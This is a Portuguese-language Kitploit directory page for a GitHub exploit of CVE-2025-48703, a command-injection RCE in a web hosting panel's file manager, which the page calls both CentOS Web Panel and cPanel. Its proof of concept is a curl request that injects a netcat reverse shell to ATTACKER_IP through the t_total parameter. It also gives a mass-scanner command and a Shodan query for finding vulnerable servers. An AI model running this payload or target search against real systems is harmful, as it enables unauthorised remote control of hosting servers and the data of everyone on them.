Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-48703 — Execução remota de código no painel web CentOS | Kitploit
Ferramentas/GitHubGitHub/skynoxk/cve-2025-48703
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoComando e ControleDesenvolvimento de Payloads
GitHubskynoxk/cve-2025-48703

CVE-2025-48703

Execução remota de código no painel web CentOS

Ver Repositório
313há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

🛡️ CVE-2025-48703 - Execução Remota de Código (RCE) no Gerenciador de Arquivos do cPanel

📌 Descrição

CVE-2025-48703 é uma vulnerabilidade de Execução Remota de Código (RCE) no módulo filemanager de um painel de controle de hospedagem web (ex.: cPanel). Ocorre devido ao tratamento de entrada não sanitizado na função acc=changePerm, que permite que um invasor injete e execute comandos arbitrários do sistema usando o parâmetro t_total.


🧨 Impacto

Esta vulnerabilidade permite que atacantes:

  • Executem comandos arbitrários no servidor alvo.
  • Estabeleçam um shell reverso para acesso persistente.
  • Potencialmente escalem privilégios ou se movam lateralmente.

⚠️ Este ataque pode ser realizado com autenticação mínima ou, em algumas configurações, sem autenticação.


🚀 Prova de Conceito (PoC)

✅ Comando de Shell Reverso

Baixar ferramenta
root@kitploit:~
curl -kis 'https://<TARGET_IP>:2083/myuser/index.php?module=filemanager&acc=changePerm' \
  --data 'fileName=.bashrc&currentPath=/home/myuser&t_total=`nc <ATTACKER_IP> 4444 -e /bin/bash`'

Uso do Scanner

root@kitploit:~
python3 Scanner.py  #Make sure targets.txt is in the same dir

Pesquisa no Shodan

root@kitploit:~
Server: cwpsrv

Referência: https://fenrisk.com/rce-centos-webpanel